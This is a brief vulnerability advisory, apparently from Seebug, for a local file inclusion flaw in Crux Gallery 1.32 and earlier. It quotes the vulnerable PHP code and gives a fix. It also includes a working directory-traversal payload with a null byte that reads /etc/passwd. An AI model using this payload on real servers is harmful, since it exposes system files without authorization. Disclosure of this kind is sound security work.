~~+=========================================================+~~ ~~+=========================================================+~~ [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability [?] Discovered On: 01/10/2008 [*] PHP.ini [*] Magic_Quotes_Gpc = Off ~~+=========================================================+~~ (index.php) // Greetz -> Osirys and darkjoker 14. $m = $_GET['m']; 15. $p = $_GET['p']; 16. $dir = $_GET['dir']; 17. require_once("main.php"); 18. require_once("themes/".$theme."/theme.php"); $theme isn't declared, so you can include any file. [*] http//[path]/index.php?theme=../../../../../etc/passwd%00 [*] How To Fix: declare $theme ~~+=========================================================+~~
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论